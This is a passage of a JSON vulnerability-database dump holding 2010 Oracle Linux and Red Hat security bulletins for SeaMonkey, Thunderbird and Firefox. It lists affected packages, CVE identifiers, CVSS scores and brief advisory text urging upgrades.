"packageVersion": "1.0.9-0.50.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-mail-1.0.9-0.50.0.1.el3.x86_64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-js-debugger-1.0.9-0.50.0.1.el3.x86_64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "i386", "packageFilename": "seamonkey-1.0.9-52.0.1.el4_8.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nspr-1.0.9-0.50.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-chat-1.0.9-0.50.0.1.el3.x86_64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "i386", "packageFilename": "seamonkey-dom-inspector-1.0.9-52.0.1.el4_8.i386.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "x86_64", "packageFilename": "seamonkey-1.0.9-52.0.1.el4_8.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-1.0.9-0.50.0.1.el3.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-1.0.9-0.50.0.1.el3.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "ia64", "packageFilename": "seamonkey-devel-1.0.9-52.0.1.el4_8.ia64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-mail-1.0.9-0.50.0.1.el3.i386.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "ia64", "packageFilename": "seamonkey-mail-1.0.9-52.0.1.el4_8.ia64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "src", "packageFilename": "seamonkey-1.0.9-52.0.1.el4_8.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "src", "packageFilename": "seamonkey-1.0.9-52.0.1.el4_8.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "src", "packageFilename": "seamonkey-1.0.9-52.0.1.el4_8.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nss-1.0.9-0.50.0.1.el3.i386.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nss-1.0.9-0.50.0.1.el3.i386.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "i386", "packageFilename": "seamonkey-chat-1.0.9-52.0.1.el4_8.i386.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "i386", "packageFilename": "seamonkey-mail-1.0.9-52.0.1.el4_8.i386.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "ia64", "packageFilename": "seamonkey-js-debugger-1.0.9-52.0.1.el4_8.ia64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nspr-1.0.9-0.50.0.1.el3.i386.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nspr-1.0.9-0.50.0.1.el3.i386.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-1.0.9-0.50.0.1.el3.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.50.0.1.el3.i386.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "i386", "packageFilename": "seamonkey-js-debugger-1.0.9-52.0.1.el4_8.i386.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "ia64", "packageFilename": "seamonkey-dom-inspector-1.0.9-52.0.1.el4_8.ia64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "ia64", "packageFilename": "seamonkey-chat-1.0.9-52.0.1.el4_8.ia64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-chat-1.0.9-0.50.0.1.el3.i386.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-devel-1.0.9-0.50.0.1.el3.i386.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "x86_64", "packageFilename": "seamonkey-devel-1.0.9-52.0.1.el4_8.x86_64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-devel-1.0.9-0.50.0.1.el3.x86_64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "i386", "packageFilename": "seamonkey-devel-1.0.9-52.0.1.el4_8.i386.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.50.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-js-debugger-1.0.9-0.50.0.1.el3.i386.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nss-1.0.9-0.50.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "i386", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.50.0.1.el3.i386.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.50.0.1.el3.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "x86_64", "packageFilename": "seamonkey-js-debugger-1.0.9-52.0.1.el4_8.x86_64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "x86_64", "packageFilename": "seamonkey-nss-devel-1.0.9-0.50.0.1.el3.x86_64.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "x86_64", "packageFilename": "seamonkey-chat-1.0.9-52.0.1.el4_8.x86_64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-1.0.9-52.0.1.el4_8.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.0.9-52.0.1.el4_8", "arch": "x86_64", "packageFilename": "seamonkey-mail-1.0.9-52.0.1.el4_8.x86_64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "src", "packageFilename": "seamonkey-1.0.9-0.50.0.1.el3.src.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "3", "packageVersion": "1.0.9-0.50.0.1.el3", "arch": "src", "packageFilename": "seamonkey-1.0.9-0.50.0.1.el3.src.rpm", "packageName": "seamonkey", "operator": "lt"}], "description": "[1.0.9-52.0.1.el4_8]\n- Added mozilla-oracle-default-prefs.js and mozilla-oracle-default-bookmarks.html\n and removed corresponding RedHat ones\n[1.0.9-52.el4]\n- Added fixes from 1.9.0.18 ", "edition": 3, "reporter": "Oracle", "published": "2010-02-17T00:00:00", "title": "seamonkey security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0171", "CVE-2010-0169"], "modified": "2010-02-17T00:00:00", "id": "ELSA-2010-0113", "href": "http://linux.oracle.com/errata/ELSA-2010-0113.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:39:10", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-25.0.1.el4", "arch": "i386", "packageFilename": "thunderbird-1.5.0.12-25.0.1.el4.i386.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-25.0.1.el4", "arch": "x86_64", "packageFilename": "thunderbird-1.5.0.12-25.0.1.el4.x86_64.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-25.0.1.el4", "arch": "ia64", "packageFilename": "thunderbird-1.5.0.12-25.0.1.el4.ia64.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-25.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-25.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-25.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-25.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "4", "packageVersion": "1.5.0.12-25.0.1.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-25.0.1.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}], "description": "[1.5.0.12-25.0.1.el4]\n- Add thunderbird-oracle-default-prefs.js for errata rebuild and remove\n thunderbird-redhat-default-prefs.js\n- Replaced clean.gif in tarball\n[1.5.0.12-25]\n- Added patches from 2.0.0.24\n[1.5.0.12-24]\n- Update patchset to fix regression as per 1.9.0.13 ", "edition": 3, "reporter": "Oracle", "published": "2010-03-17T00:00:00", "title": "thunderbird security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-2470", "CVE-2009-3076", "CVE-2009-3979", "CVE-2009-3376", "CVE-2009-1571", "CVE-2009-3274", "CVE-2010-0159", "CVE-2009-3380", "CVE-2009-3072", "CVE-2009-0689", "CVE-2009-2463", "CVE-2010-0171", "CVE-2009-3075", "CVE-2010-0163", "CVE-2009-3384", "CVE-2009-2466", "CVE-2009-3077", "CVE-2009-2462", "CVE-2010-0169"], "modified": "2010-03-17T00:00:00", "id": "ELSA-2010-0154", "href": "http://linux.oracle.com/errata/ELSA-2010-0154.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2017-09-09T07:19:16", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.0.18-1.el4", "arch": "i386", "packageFilename": "firefox-3.0.18-1.el4.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.0.18-1.el4", "arch": "src", "packageFilename": "firefox-3.0.18-1.el4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.0.18-1.el4", "arch": "ia64", "packageFilename": "firefox-3.0.18-1.el4.ia64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.0.18-1.el4", "arch": "x86_64", "packageFilename": "firefox-3.0.18-1.el4.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.0.18-1.el4", "arch": "ppc", "packageFilename": "firefox-3.0.18-1.el4.ppc.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.0.18-1.el4", "arch": "s390", "packageFilename": "firefox-3.0.18-1.el4.s390.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.0.18-1.el4", "arch": "s390x", "packageFilename": "firefox-3.0.18-1.el4.s390x.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.0.18-1.el5_4", "arch": "i386", "packageFilename": "firefox-3.0.18-1.el5_4.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "i386", "packageFilename": "xulrunner-1.9.0.18-1.el5_4.i386.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.0.18-1.el5_4", "arch": "src", "packageFilename": "firefox-3.0.18-1.el5_4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "src", "packageFilename": "xulrunner-1.9.0.18-1.el5_4.src.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.0.18-1.el5_4", "arch": "x86_64", "packageFilename": "firefox-3.0.18-1.el5_4.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "x86_64", "packageFilename": "xulrunner-1.9.0.18-1.el5_4.x86_64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "ppc64", "packageFilename": "xulrunner-1.9.0.18-1.el5_4.ppc64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "ppc", "packageFilename": "xulrunner-devel-unstable-1.9.0.18-1.el5_4.ppc.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "ppc64", "packageFilename": "xulrunner-devel-1.9.0.18-1.el5_4.ppc64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.0.18-1.el5_4", "arch": "ppc", "packageFilename": "firefox-3.0.18-1.el5_4.ppc.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "ppc", "packageFilename": "xulrunner-1.9.0.18-1.el5_4.ppc.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "ppc", "packageFilename": "xulrunner-devel-1.9.0.18-1.el5_4.ppc.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "s390x", "packageFilename": "xulrunner-devel-unstable-1.9.0.18-1.el5_4.s390x.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "s390", "packageFilename": "xulrunner-1.9.0.18-1.el5_4.s390.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.0.18-1.el5_4", "arch": "s390x", "packageFilename": "firefox-3.0.18-1.el5_4.s390x.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "s390x", "packageFilename": "xulrunner-devel-1.9.0.18-1.el5_4.s390x.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "s390", "packageFilename": "xulrunner-devel-1.9.0.18-1.el5_4.s390.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "s390x", "packageFilename": "xulrunner-1.9.0.18-1.el5_4.s390x.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.0.18-1.el5_4", "arch": "s390", "packageFilename": "firefox-3.0.18-1.el5_4.s390.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "i386", "packageFilename": "xulrunner-devel-unstable-1.9.0.18-1.el5_4.i386.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "i386", "packageFilename": "xulrunner-devel-1.9.0.18-1.el5_4.i386.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "ia64", "packageFilename": "xulrunner-devel-1.9.0.18-1.el5_4.ia64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "ia64", "packageFilename": "xulrunner-1.9.0.18-1.el5_4.ia64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "ia64", "packageFilename": "xulrunner-devel-unstable-1.9.0.18-1.el5_4.ia64.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.0.18-1.el5_4", "arch": "ia64", "packageFilename": "firefox-3.0.18-1.el5_4.ia64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "x86_64", "packageFilename": "xulrunner-devel-unstable-1.9.0.18-1.el5_4.x86_64.rpm", "packageName": "xulrunner-devel-unstable", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.0.18-1.el5_4", "arch": "x86_64", "packageFilename": "xulrunner-devel-1.9.0.18-1.el5_4.x86_64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}], "description": "Mozilla Firefox is an open source Web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox.\n\nA use-after-free flaw was found in Firefox. Under low memory conditions,\nvisiting a web page containing malicious content could result in Firefox\nexecuting arbitrary code with the privileges of the user running Firefox.\n(CVE-2009-1571)\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2010-0159, CVE-2010-0160)\n\nTwo flaws were found in the way certain content was processed. An attacker\ncould use these flaws to create a malicious web page that could bypass the\nsame-origin policy, or possibly run untrusted JavaScript. (CVE-2009-3988,\nCVE-2010-0162)\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 3.0.18. You can find a link to the Mozilla\nadvisories in the References section of this errata.\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 3.0.18, which corrects these issues. After installing the\nupdate, Firefox must be restarted for the changes to take effect.", "reporter": "RedHat", "published": "2010-02-17T05:00:00", "type": "redhat", "title": "(RHSA-2010:0112) Critical: firefox security update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1571", "CVE-2009-3988", "CVE-2010-0159", "CVE-2010-0160", "CVE-2010-0162", "CVE-2010-0167", "CVE-2010-0169", "CVE-2010-0171"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T11:56:27", "id": "RHSA-2010:0112", "href": "https://access.redhat.com/errata/RHSA-2010:0112", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-05-27T21:41:55", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "i386", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-52.el4_8.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "i386", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-52.el4_8.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "i386", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-52.el4_8.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "i386", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-52.el4_8.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "i386", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-52.el4_8.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "i386", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-52.el4_8.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "src", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-52.el4_8.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "ia64", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-52.el4_8.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "ia64", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-52.el4_8.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "ia64", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-52.el4_8.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "ia64", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-52.el4_8.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "ia64", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-52.el4_8.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "ia64", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-52.el4_8.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "x86_64", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-52.el4_8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "x86_64", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-52.el4_8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "x86_64", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-52.el4_8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "x86_64", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-52.el4_8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "x86_64", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-52.el4_8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "x86_64", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-52.el4_8.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "ppc", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-52.el4_8.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "ppc", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-52.el4_8.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "ppc", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-52.el4_8.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "ppc", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-52.el4_8.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "ppc", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-52.el4_8.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "ppc", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-52.el4_8.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-52.el4_8", "arch": "s390", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-52.el4_8.s390.rpm", "operator": "lt"}, {"OS": "RedHat", 